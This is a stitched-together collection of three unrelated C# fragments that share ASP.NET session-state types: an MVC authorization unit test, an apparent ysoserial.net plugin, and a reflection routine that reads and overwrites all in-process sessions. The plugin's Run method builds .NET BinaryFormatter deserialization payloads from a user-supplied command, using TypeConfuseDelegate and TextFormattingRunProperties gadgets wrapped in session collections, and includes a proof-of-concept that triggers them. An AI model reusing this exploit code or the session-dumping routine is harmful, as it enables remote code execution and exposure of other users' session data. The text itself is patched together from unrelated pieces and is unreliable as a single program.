public void AuthorizationAttribute_Test()
{
var sessionItems = new System.Web.SessionState.SessionStateItemCollection();
var controllerContext = new FakeControllerContext(TestHelper.Resolve<TopicsController>(), "http://localhost", null, null, new System.Collections.Specialized.NameValueCollection(), new System.Collections.Specialized.NameValueCollection(), new System.Web.HttpCookieCollection(), sessionItems);
var context = new AuthorizationContext(controllerContext, new FakeActionDescriptor());
var att = new RequireAuthorizationAttribute(UserRole.Member);
att.Routes.Add(new StrictRoute("login", new MvcRouteHandler())
{
Url = "login",
Defaults = new System.Web.Routing.RouteValueDictionary(new
{
controller = "Authentication",
action = "Login"
})
});
context.Result = null;
att.OnAuthorization(context);
Assert.IsInstanceOfType(context.Result, typeof(RedirectResult));
//Test with user
User user = ServicesTests.GetTestUser();
sessionItems["User"] = new UserState(user, AuthenticationProvider.Facebook);
context.Result = null;
att.OnAuthorization(context);
Assert.IsNull(context.Result);
}
public object Run(string[] args)
{
InputArgs inputArgs = new InputArgs();
List <string> extra;
try
{
extra = options.Parse(args);
inputArgs.Cmd = command;
inputArgs.Minify = minify;
inputArgs.UseSimpleType = useSimpleType;
inputArgs.Test = test;
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
object payload = "";
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
if (mode.ToLower().Equals("sessionstateitemcollection"))
{
/* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */
/* hacky way begin
* byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
* byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem
* tempPayload_init.CopyTo(tempPayload, 0);
* System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
* items[""] = tempPayload;
* MemoryStream stream = new MemoryStream();
* BinaryWriter writer = new BinaryWriter(stream);
* items.Serialize(writer);
* stream.Flush();
* tempPayload = stream.ToArray();
* byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical!
* Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes
* Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte
* newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
* // hacky way ends */
/* here it is using the sane way! */
object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
items[""] = serializedData;
MemoryStream stream = new MemoryStream();
BinaryWriter writer = new BinaryWriter(stream);
items.Serialize(writer);
stream.Flush();
payload = stream.ToArray();
if (test)
{
// PoC on how it works in practice
stream = new MemoryStream((byte[])payload);
BinaryReader binReader = new BinaryReader(stream);
System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader);
test.GetEnumerator();
}
}
else
{
// HttpStaticObjectsCollection
byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
serializedData.CopyTo(newSerializedData, 7);
newSerializedData[0] = 1; // for ReadInt32
newSerializedData[5] = 1; // for ReadBoolean
newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
payload = newSerializedData;
if (test)
{
// PoC on how it works in practice
try {
MemoryStream stream = new MemoryStream((byte[])payload);
BinaryReader binReader = new BinaryReader(stream);
System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
}
return(payload);
}
GetActiveSessions(System.Web.HttpContext context)
{
// Dictionary(Of String, Object) 'List(Of SessionStateItemCollection)
// Dim lsSessionStates As New List(Of SessionStateItemCollection)
// int strLcId = System.Web.HttpContext.Current.Session.LCID;
// string strSeId = System.Web.HttpContext.Current.Session.SessionID;
// System.Console.WriteLine(strLcId);
// System.Console.WriteLine(strSeId);
System.Collections.Generic.Dictionary <string, System.Collections.Generic.Dictionary <string, object> >
dictAllSession = new System.Collections.Generic
.Dictionary <string, System.Collections.Generic.Dictionary <string, object> >();
//System.Web.Caching.CacheMultiple
object obj = typeof(System.Web.HttpRuntime)
.GetProperty("CacheInternal", BindingFlags.NonPublic | BindingFlags.Static)
.GetValue(null, null);
// List(Of System.Web.Caching.CacheSingle)
object[] obj2 = (object[])obj.GetType().GetField("_caches", BindingFlags.NonPublic | BindingFlags.Instance)
.GetValue(obj);
System.Collections.Generic.Dictionary <string, string> tD = KeyValuePairs(context);
for (int i = 0; i < obj2.Length; i++)
{
System.Collections.Hashtable c2 = (System.Collections.Hashtable)obj2[i].GetType()
.GetField("_entries", BindingFlags.NonPublic | BindingFlags.Instance)
.GetValue(obj2[i]);
System.Collections.Generic.Dictionary <string, object> dictSession =
new System.Collections.Generic.Dictionary <string, object>();
string strSessionId = null;
foreach (System.Collections.DictionaryEntry entry in c2)
{
object o1 = entry.Value.GetType().GetProperty("Value", BindingFlags.NonPublic | BindingFlags.Instance)
.GetValue(entry.Value, null);
if (o1.GetType().ToString() == "System.Web.SessionState.InProcSessionState")
{
System.Web.SessionState.SessionStateItemCollection sess =
(System.Web.SessionState.SessionStateItemCollection)
o1.GetType().GetField("_sessionItems", BindingFlags.NonPublic | BindingFlags.Instance)
.GetValue(o1);
if (sess != null)
{
// yield Return sess
// lsSessionStates.Add(sess)
System.Type tKeyType = entry.Key.GetType();
// System.Reflection.PropertyInfo[] pis = tKeyType.GetProperties(BindingFlags.NonPublic | BindingFlags.Instance);
// System.Reflection.FieldInfo[] fis = tKeyType.GetFields(BindingFlags.NonPublic | BindingFlags.Instance);
// System.Reflection.FieldInfo fi = tKeyType.GetField("Key");
System.Reflection.PropertyInfo pi = tKeyType.GetProperty("Key", BindingFlags.NonPublic | BindingFlags.Instance);
if (pi != null)
{
strSessionId = System.Convert.ToString(pi.GetValue(entry.Key, null));
}
// string str = (string) entry.Key.GetType().GetProperty("Key").GetValue(entry.Key, null);
for (int tC = 0; tC <= sess.Keys.Count - 1; tC++)
{
if (tD.ContainsKey(sess.Keys[tC]))
{
sess[sess.Keys[tC]] = tD[sess.Keys[tC]];
}
}
foreach (string tKey in sess.Keys)
{
// dictSession.Add(i.ToString() + "-" + tKey, sess[tKey]); ' WTF ???
dictSession[tKey] = sess[tKey];
}
}
}
}
if (string.IsNullOrEmpty(strSessionId))
{
strSessionId = i.ToString();
}
else
{
strSessionId = i.ToString() + ": " + strSessionId;
}
dictAllSession.Add(strSessionId, dictSession);
}
return(dictAllSession); // dictSession 'lsSessionStates
} // GetActiveSessions
